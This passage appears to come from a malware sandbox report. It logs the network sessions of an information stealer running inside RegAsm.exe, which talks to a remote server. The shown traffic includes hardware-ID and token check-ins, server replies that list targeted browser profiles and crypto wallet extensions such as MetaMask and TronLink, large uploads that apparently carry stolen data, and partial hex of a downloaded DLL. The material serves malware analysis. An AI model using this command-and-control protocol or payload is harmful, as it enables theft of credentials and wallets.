2024-04-26 09:02:54 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 45 35 32 31 30 32 38 42 34 36 37 39 34 33 34 30 30 30 36 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="hwid"DE521028B467943400063-a33c7340-61ca-11ee-8c18-806e6f6e6963------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------I
2024-04-26 09:02:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:02:55 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|9e9a3fe39b625d5d964f4b5ebd8f18e6\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:56 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:02:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CAAAAFBKFIECAAKECGCACont
2024-04-26 09:02:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:02:57 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:57 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:02:57 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IEGCBAAFHDHDHJKEGCFCCont
2024-04-26 09:02:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:02:58 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:02:59 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 7973 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:02:59 UTC	7973	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------ECAKECAEGDHIECBGHIIICont
2024-04-26 09:03:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:00 UTC	179	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:01 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:00 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT Connection: close ETag: "66264d40-258600" Accept-Ranges: bytes
2024-04-26 09:03:01 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-26 09:03:01 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-26 09:03:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-26 09:03:02 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-26 09:03:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:03 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 09:03:03 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 39 61 33 66 65 33 39 62 36 32 35 64 35 64 39 36 34 66 34 62 35 65 62 64 38 66 31 38 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"9e9a3fe39b625d5d964f4b5ebd8f18e6------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------DBFIEHDHIIIECAAKECFHCont
2024-04-26 09:03:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 09:03:04 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
